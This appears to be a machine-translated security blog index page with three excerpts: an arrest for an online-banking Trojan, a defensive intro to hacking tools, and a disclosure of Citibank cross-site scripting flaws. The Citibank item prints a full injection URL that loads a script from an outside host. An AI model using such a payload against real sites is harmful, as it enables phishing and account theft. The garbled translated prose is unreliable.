网络安全厂商员工为谋私利开发网银木马

Some people have been previously suspected virus is not safe to do their business out of the whole, there is no direct evidence has been disclosed. Recently saw a net against attacks launched to the arrest of news.

In this case, the suspects for personal development of a network of Trojans, targeted a bank’s digital certificate, net account password.

reminded that the network users, mobile digital certificates with the best of each spent on the disconnect. Use of paper-based digital certificates is also quite safe, careful not to back up the digital certificate stored in local hard disk. Attack, even by the number of net-user certificates, account number and password, the attacker would like to sign in net operation, must be in their own computer to complete a certificate of rehabilitation, re-sign after the completion of the relevant banking business. In the process of restoration of the certificate, the banks will be asked customers to apply for the use of digital certificates to create a number of security issues, the wrong answer on the resumption of failure. Moreover, the or failure of all the news through mobile phone messages or e-mail notice to customers. Therefore, the 24-hour phone start-up is a good habit. Read more »

Share/Save/Bookmark

Rookie entry of eight security tools

How you look at the phenomenon of hackers and hacking ? Worship ? Despised ? Or fear ? This article will introduce you to eight used the tool and its method of defense. It is worth noting, these are just the initial hacking, or even hackers is not the “hackers” are the tools used. It seems that the real hackers in these tools is the primary, but these hacking tools of our ordinary users of mass destruction is very large, there is a need to tell us about their characteristics and defense methods.

This paper presents several representative hacking tools, we really have to master the course, not how to use these hacking tools, but through their understanding of hacking tools, master the methods to prevent , blocking all kinds of loopholes that may arise .

Read more »

Share/Save/Bookmark

Citibank’s critical cross-site scripting vulnerabilities

DaiMon and mox have discovered two critical XSS flaws on Citibank’s .

The first one is still pending a fix since 03/04/08:
http://www.xssed.com/mirror/34872/

Citibank.com XSS:

http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=
“/><iframesrc=http://google.com></iframe><scriptsrc=http://ha.ckers.org/xss.js?/>
&_products=NNNNNNNNNNNNNNNNN&_ll=&_mid=&_dta=&_m=0&_cn=&_j=
&_jcontext=/US&_jfp=false&BVE=https://web.da-us.citibank.com&BVP=/cgi-bin/citifi/scripts/
&BV_UseBVCookie=yes

Phishers can display a Citibank phishing page until their victim’s session expires or gets deleted (View 2nd screenshot). Read more »

Share/Save/Bookmark

Page 1 of 11